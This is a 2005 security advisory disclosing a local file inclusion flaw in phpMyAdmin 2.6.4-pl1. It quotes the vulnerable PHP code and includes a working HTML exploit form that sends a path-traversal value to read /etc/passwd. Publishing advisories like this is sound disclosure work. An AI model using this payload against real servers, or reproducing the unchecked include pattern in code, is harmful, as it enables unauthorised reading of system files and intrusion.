<<< Date Index >>>     <<< Thread Index >>>

[SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
    require('./' . $__redirect);
    exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
    // if a subform is present and should be used
    // the rest of the form is deprecated
    $subform_id = key( $_POST['usesubform'] );
    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;
    if ( isset( $_POST['redirect'] ) 
      && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
        $__redirect = $_POST['redirect'];
        unset( $_POST['redirect'] );
    } // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If varible $_POST['usesubform'] exists and is array, that we can created new 
varibles for $_POST (example $_POST['redirect']).

    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;

where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com><IMG 
SRC="http://securityreason.com/gfx/small_logo.png";></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php"; method=post 
enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" 
value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----